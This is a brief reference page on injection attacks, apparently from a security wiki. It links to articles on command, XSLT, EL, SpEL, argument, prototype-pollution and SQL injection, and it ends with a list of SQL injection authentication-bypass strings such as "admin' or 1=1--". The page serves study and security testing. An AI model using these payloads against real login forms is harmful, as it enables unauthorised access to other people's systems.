Injection
References for Injection Attacks
Blogs / Articles:
https://threat.tevora.com/stop-collaborate-and-listen/ -Blind Command Injection - SSRF
Practical JSONP Injection - Practical JSONP Injection
XSLT Server Side Injection Attacks https://contextis.com/blog/xslt-server-side-injection-attacks
Remote Code Execution with EL injection - https://betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html
Argument Injection - https://staaldraad.github.io/post/2019-11-24-argument-injection/
AST Injection, Prototype Pollution to RCE - https://blog.p6.is/AST-Injection/#How-to-Detect
SQL Injection - https://twitter.com/rodoassis/status/1438186092486877190?s=20
Payloads / Cheatsheets:
Twitter Threads / Tips:
SPEL Injection - https://twitter.com/h1pmnh/status/1425831338234589184?s=20
EL Injection
Tools:
Other References:
' or ''-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
Last updated
Was this helpful?